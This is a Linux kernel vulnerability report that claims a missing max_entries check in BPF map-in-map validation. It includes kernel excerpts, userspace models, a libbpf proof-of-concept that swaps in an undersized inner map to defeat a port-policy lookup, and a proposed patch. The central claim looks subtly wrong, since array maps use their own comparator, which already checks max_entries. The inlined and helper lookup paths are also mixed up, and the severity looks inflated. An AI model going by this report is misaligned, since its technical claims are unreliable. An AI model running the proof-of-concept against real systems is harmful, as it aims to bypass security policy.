CVE Candidate: Missing max_entries Validation in BPF Map-in-Map Allows Security-Policy Bypass and Undermines Spectre Mitigation

Summary

bpf_map_meta_equal() in kernel/bpf/map_in_map.c validates a candidate inner map against its prototype when a user calls bpf_map_update_elem on an ARRAY_OF_MAPS or HASH_OF_MAPS outer map. The function checks map_type, key_size, value_size, map_flags, and the BTF record, but omits max_entries. A local user with CAP_BPF (or any process holding an fd to the outer map) can therefore insert an inner map whose max_entries differs arbitrarily from the prototype, violating the invariants the BPF verifier relied on when it analysed the program at load time.

The sample samples/bpf/test_map_in_map.bpf.c exercises this path directly and makes the impact concrete.

Affected Files

File                               Location                        Role
kernel/bpf/map_in_map.c            bpf_map_meta_equal(), line 83   Missing check
kernel/bpf/map_in_map.c            bpf_map_fd_get_ptr(), line 94   Calls the flawed comparator
samples/bpf/test_map_in_map.bpf.c  all                             BPF program whose verifier assumptions are violated

Root Cause

/* kernel/bpf/map_in_map.c – prototype is built correctly … */
inner_map_meta->max_entries = inner_map->max_entries;   // line 40 – saved
inner_array_meta->index_mask = inner_array->index_mask; // line 69 – saved

/* … but equality check ignores max_entries entirely: */
bool bpf_map_meta_equal(const struct bpf_map *meta0,
                        const struct bpf_map *meta1)
{
    return meta0->map_type   == meta1->map_type   &&
           meta0->key_size   == meta1->key_size   &&
           meta0->value_size == meta1->value_size &&
           meta0->map_flags  == meta1->map_flags  &&
           btf_record_equal(meta0->record, meta1->record);
    /* ← max_entries NEVER compared */
}

bpf_map_fd_get_ptr() calls inner_map_meta->ops->map_meta_equal(inner_map_meta, inner_map) and accepts the candidate if it returns true. Because max_entries is not part of that test, any array/hash map with matching type/key/value can be swapped in.
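
To make the gap concrete, here is a minimal userspace sketch, not kernel code. struct map_meta and meta_equal_as_described() are hypothetical stand-ins for struct bpf_map and the comparator quoted above (the btf_record_equal() term is left out for brevity). It only illustrates that two descriptors differing solely in max_entries compare equal under the comparison as described.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical, simplified stand-in for the struct bpf_map fields that
 * the comparator reads, plus max_entries. */
struct map_meta {
    uint32_t map_type;
    uint32_t key_size;
    uint32_t value_size;
    uint32_t map_flags;
    uint32_t max_entries;
};

/* Mirrors the comparison as described in this report: max_entries is
 * never consulted. */
static bool meta_equal_as_described(const struct map_meta *a,
                                    const struct map_meta *b)
{
    return a->map_type   == b->map_type   &&
           a->key_size   == b->key_size   &&
           a->value_size == b->value_size &&
           a->map_flags  == b->map_flags;
}

/* Prototype sized as in the sample (65536 entries) versus a 1-entry
 * candidate. 2 is the UAPI enum value of BPF_MAP_TYPE_ARRAY. */
static bool undersized_candidate_accepted(void)
{
    struct map_meta proto     = { 2, 4, 4, 0, 65536 };
    struct map_meta candidate = { 2, 4, 4, 0, 1 };

    return meta_equal_as_described(&proto, &candidate);
}
```

In this model undersized_candidate_accepted() returns true, which is the acceptance that the rest of this report builds on.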

Impact

1. BPF Verifier Invariant Violation → Spectre v1 Mitigation Bypass

The prototype’s max_entries and index_mask are recorded in inner_map_meta (stored in outer_map->inner_map_meta), which is what the verifier sees when it analyses the program. For the inlined lookup path (array_map_gen_lookup, arraymap.c:220), the bounds-check instruction and the masking instruction are emitted once, when the verifier rewrites the program at load time, using the prototype’s values:

*insn++ = BPF_JMP_IMM(BPF_JGE, ret, map->max_entries, 4);  // prototype max
*insn++ = BPF_ALU32_IMM(BPF_AND, ret, array->index_mask);  // prototype mask

If a substituted inner map has a larger max_entries (e.g. 2 × MAX_NR_PORTS = 131072), its index_mask is 0x1FFFF rather than the prototype’s 0xFFFF. After substitution, the non-inlined helper path (array_map_lookup_elem) does its pointer arithmetic with the actual (larger) index_mask of the swapped-in map (arraymap.c:175):

return array->value + (u64)array->elem_size * (index & array->index_mask);

Spectre v1 protection relies on the AND mask matching the conditional branch. With mismatched masks the speculative window is wider than the verifier intended, re-opening the Spectre gadget that index masking (applied whenever bypass_spec_v1 is not set) was supposed to close.
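
The mask values quoted above can be reproduced with a small userspace sketch. It assumes index_mask is derived by rounding max_entries up to a power of two and subtracting one; index_mask_for() and masked_index() are hypothetical helper names, not kernel functions.

```c
#include <stdint.h>

/* Assumed derivation of index_mask: round max_entries up to the next
 * power of two, then subtract one. */
static uint32_t index_mask_for(uint32_t max_entries)
{
    uint64_t pow2 = 1;

    while (pow2 < max_entries)
        pow2 <<= 1;
    return (uint32_t)(pow2 - 1);
}

/* The index that survives masking, for a given mask. */
static uint32_t masked_index(uint32_t index, uint32_t mask)
{
    return index & mask;
}
```

Under that assumption, index_mask_for(65536) is 0xFFFF and index_mask_for(131072) is 0x1FFFF. An index such as 70000 is folded down to 4464 by the prototype's mask but passes through unchanged under the larger one, which is the mismatch this section is concerned with.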

2. Silent Security-Policy Bypass

test_map_in_map.bpf.c maps TCP ports to policy values. The outer map a_of_port_a (type ARRAY_OF_MAPS) has max_entries = MAX_NR_PORTS = 65536; its prototype inner map inner_a also has max_entries = 65536.

Attack:

  1. Open the fd for a_of_port_a.
  2. Create a new BPF_MAP_TYPE_ARRAY map with matching key_size=4, value_size=4, but max_entries=1.
  3. Call bpf(BPF_MAP_UPDATE_ELEM) to insert it at any port index. bpf_map_meta_equal accepts it.
  4. The running BPF program calls bpf_map_lookup_elem(inner_map, &port_key). The actual inner map’s array_map_lookup_elem checks index >= array->map.max_entries (i.e. port_key >= 1): every port except 0 returns NULL.
  5. do_reg_lookup returns -ENOENT; the reg_result_h entry is written as “not found”.

Any firewall or auditing decision downstream of reg_result_h now sees a false negative for every port except 0 — an attacker-controlled silent bypass.
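
Steps 4 and 5 can be sketched in plain userspace C. struct model_array, model_lookup() and model_reg_lookup() are hypothetical models of the array map and of the do_reg_lookup behaviour described above, and the value 42 is an arbitrary illustrative policy value; none of this is the sample's actual code.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical userspace model of an array map holding int values. */
struct model_array {
    uint32_t max_entries;
    int *values;
};

/* Same bounds rule as step 4: an index at or past max_entries misses. */
static int *model_lookup(struct model_array *map, uint32_t index)
{
    if (index >= map->max_entries)
        return NULL;
    return &map->values[index];
}

/* Modelled on step 5: a miss is reported as -ENOENT. */
static int model_reg_lookup(struct model_array *map, uint32_t port)
{
    int *result = model_lookup(map, port);

    return result ? *result : -ENOENT;
}

/* Look up a port in a substituted map that has max_entries = 1. */
static int lookup_in_one_entry_map(uint32_t port)
{
    int storage[1] = { 42 };   /* arbitrary illustrative policy value */
    struct model_array tiny = { 1, storage };

    return model_reg_lookup(&tiny, port);
}
```

In this model only port 0 resolves; port 80, like every other non-zero port, yields -ENOENT.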

3. Out-of-Bounds Read (larger inner map)

Conversely, a substituted inner map with max_entries much larger than the prototype causes the BPF program to successfully look up indices the prototype never covered. The returned pointer points into the swapped-in map’s value array beyond the bounds assumed by the verifier, leaking uninitialised or attacker-controlled kernel heap data through the result maps (reg_result_h, inline_result_h).

Severity

Critical — local privilege escalation / information disclosure / security-policy bypass.

Attribute            Value
Attack vector        Local
Privileges required  CAP_BPF (or open fd to the outer map)
User interaction     None
Confidentiality      High (kernel heap leak)
Integrity            High (verifier invariant broken, Spectre mitigation undermined)
Availability         None

Reproduction Sketch

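#include <stdio.h>
#include <bpf/bpf.h>   // libbpf: bpf_obj_get(), bpf_map_create(), bpf_map_update_elem()

int main(void)
{
    // 1. Load the test_map_in_map BPF program first. This sketch assumes the
    //    outer map has been pinned in bpffs at the path below.
    int outer_fd = bpf_obj_get("/sys/fs/bpf/a_of_port_a");
    if (outer_fd < 0) { perror("bpf_obj_get"); return 1; }

    // 2. Create undersized inner map (same type/key/value, wrong max_entries)
    int inner_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY,
                                  NULL, sizeof(__u32), sizeof(int),
                                  1,   // max_entries = 1, prototype expects 65536
                                  NULL);
    if (inner_fd < 0) { perror("bpf_map_create"); return 1; }

    // 3. Insert at port 80; success means bpf_map_meta_equal() accepted it
    __u32 key = 80;
    if (bpf_map_update_elem(outer_fd, &key, &inner_fd, BPF_ANY)) {
        perror("bpf_map_update_elem");
        return 1;
    }

    // 4. Connect to dead:beef::80: the BPF probe fires and the inner lookup
    //    returns -ENOENT for port 80, silently bypassing any policy recorded there.
    return 0;
}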

Fix

Add max_entries to the equality check:

bool bpf_map_meta_equal(const struct bpf_map *meta0,
                        const struct bpf_map *meta1)
{
    return meta0->map_type    == meta1->map_type    &&
           meta0->key_size    == meta1->key_size    &&
           meta0->value_size  == meta1->value_size  &&
           meta0->map_flags   == meta1->map_flags   &&
           meta0->max_entries == meta1->max_entries &&   /* ← add this */
           btf_record_equal(meta0->record, meta1->record);
}
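
One way to sanity-check the proposed comparison outside the kernel is a small userspace model. As before, struct map_meta is a hypothetical simplification of struct bpf_map, the btf_record_equal() term is omitted, and candidate_accepted() is an illustrative helper rather than an existing function.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical, simplified stand-in for the compared struct bpf_map fields. */
struct map_meta {
    uint32_t map_type;
    uint32_t key_size;
    uint32_t value_size;
    uint32_t map_flags;
    uint32_t max_entries;
};

/* Model of the proposed comparison, with max_entries included. */
static bool meta_equal_with_max_entries(const struct map_meta *a,
                                        const struct map_meta *b)
{
    return a->map_type    == b->map_type    &&
           a->key_size    == b->key_size    &&
           a->value_size  == b->value_size  &&
           a->map_flags   == b->map_flags   &&
           a->max_entries == b->max_entries;
}

/* Compare a candidate of the given size against a 65536-entry prototype.
 * 2 is the UAPI enum value of BPF_MAP_TYPE_ARRAY. */
static bool candidate_accepted(uint32_t candidate_max_entries)
{
    struct map_meta proto     = { 2, 4, 4, 0, 65536 };
    struct map_meta candidate = { 2, 4, 4, 0, candidate_max_entries };

    return meta_equal_with_max_entries(&proto, &candidate);
}
```

In this model a candidate with max_entries of 1 or 131072 is rejected, while one that matches the prototype's 65536 entries is still accepted.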

References

  • kernel/bpf/map_in_map.c: bpf_map_meta_equal() (line 83), bpf_map_fd_get_ptr() (line 94), bpf_map_meta_alloc() (line 10)
  • kernel/bpf/arraymap.c: array_map_gen_lookup() (line 220), array_map_lookup_elem() (line 170)
  • samples/bpf/test_map_in_map.bpf.c — affected BPF program
  • Related prior art: CVE-2021-20268 (out-of-bounds access via dev_map_init_map / sock_map_alloc), CVE-2022-2905 (out-of-bounds read via bpf_tail_call with a key beyond the map's max_entries)